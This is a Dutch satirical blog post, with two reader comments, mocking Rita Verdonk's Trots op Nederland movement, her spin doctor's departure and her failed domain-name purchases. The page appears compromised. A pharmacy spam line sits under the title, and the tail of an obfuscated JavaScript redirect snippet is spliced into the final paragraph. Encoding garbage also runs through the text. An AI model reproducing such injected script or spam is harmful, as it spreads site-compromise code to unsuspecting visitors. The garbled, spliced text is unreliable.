Trots op Nederland?

Cheap rogaine foam for women

Het schip Verdonk is zinkende. Maar dat is eigenlijk ook niet zo gek.

Het nieuws dat Kay van der Linde opstapte als spindoctor van ‘ons’ Rita, bereikt mij namelijk via het Parool van vanavond. Mijn vaste nieuwssite vond de transfer de moeite van het vermelden niet waard en ookAi??in headlines op de radio en het digitale lunchnieuws zag ik niets voorbij komen. Het werd dus een kattebelletje in de lokale avondkrant.

Erg veel duidelijker werd ik er ook niet van, dus trok ik mijn stoute schoenen aan voor een bezoek aan een website, die ik uit principe eigenlijk niet wil bezoeken. Nou is het op het zinkende Verdonk-schip natuurlijk makkelijk scoren, dus voor wat gekleurde achtergrondinformatie surfte ik naar ton.nl. Dat adres leek me toch de meest logische webstek voor IJzeren Rita en haar krimpende gevolg. Maar zelfs met steun van John de Mol en Nina Brink was het haar niet gelukt om de url te kopen van een Duits(!)Ai??groothandelcentrum voor woondecoratie, tuindecoratie, woonaccessoires, bloemisterijartikelen, kadoartikelen, glasdecoratie Ai??n seizoensdecoratie. En verdomd, ook het adres www.trotsopnederland.nl blijkt eigendom van een domeinverkoper waar Verdonk de hoofdprijs aan weigerde te betalen. WAi??l op de site: een warme link naar het verkiezingsprogramma van het CDA, reclame voor een symposium met Rouvoet en Van der Ham en een advertentie voor een dieetprogramma waarin je in Ai??Ai??n week niet vijf kilo afvalt maar vermagert.


Voor de Verdonk clan werd het uiteindelijk dus maar trotsopnederland.com. De zaak lijkt mij zo klaar als een klontje. Kay van der Linde heeft Rita wat duidelijke tips gegeven. EAi??n daarvan was om het internet niet zo serieus te nemen en dus niet te malen om het feit dat je niet bent te vinden. Ken je doelgroep, moet Van der Linde gezegd hebben; “die mensen hebben toch geen internet, die kijken alleen Boulevard en Shownieuws”. En Verdonk, het onzekere en makke schaap, gaf hem gelijk. We hebben hier immers te maken met een visionair politica met wereldwijde aspiraties. Aim high Rita, aim for the stars! De stoomboot Verdonk vaart door, onverstoord en recht door zee. De bodem is nog lang niet in zicht. (kuch) xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

"I used to want to change the world. Now, I just want to leave the room with a little dignity."

2 Reacties op “Trots op Nederland?”

  1. Rita bij Pauw en Witteman: Ik heb een website waar mensen ideeen kunnen aandragen en word verguisd. obama heeft een website en hij wordt geprezen. Zo is Nederland.

    Pauw: u wilt dus eigenlijk zeggen dat… Obama dat idee van u heeft overgenomen.

    *grinnik*

  2. Dat JJ een Obama fan was liet zich wel raden…

Laat een bericht achter